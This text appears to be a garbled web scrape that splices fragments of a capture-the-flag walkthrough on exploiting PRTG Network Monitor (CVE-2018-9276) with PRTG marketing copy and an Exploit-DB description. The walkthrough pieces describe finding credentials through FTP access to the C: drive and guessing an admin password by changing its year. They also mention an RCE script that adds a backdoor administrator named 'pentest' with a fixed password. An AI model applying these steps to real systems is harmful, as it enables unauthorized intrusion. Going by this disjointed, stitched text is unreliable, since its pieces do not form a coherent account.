There obviously is a difference when PRTG executes the script vs. when you execute it. With our free apps for Android and iOS, you can get push notifications delivered directly to your phone. CVE-2018-9276 . PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution Exploit 2019-03-11T00:00:00. We have access to C: through the ftp server so we can search for credentials there. On googling more about this we can find a script that exploits a RCE vulnerability in this monitoring framework and basically adds a user named “pentest” in the administrators group with the password “P3nT3st!”. Setting PRTG up for the first time and getting the first monitoring results happens almost automatically. On further researching on the internet about this exploit, we found this script on GitHub. Remote code execution prtg network monitor cve2018-9276 - M4LV0/PRTG-Network-Monitor-RCE You can find the script here So we will be using this script however a small change needs to be done before using it. We have an exploit available in exploit-db for this software: PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away.
prtgadmin:PrTg@dmin2019 works immediately and we are greeted by the welcome screen: Guessing the password year increment reads easy here, but it actually had me stuck longer than it should have :-) Having access, we can now look at the exploit we found earlier via searchsploit.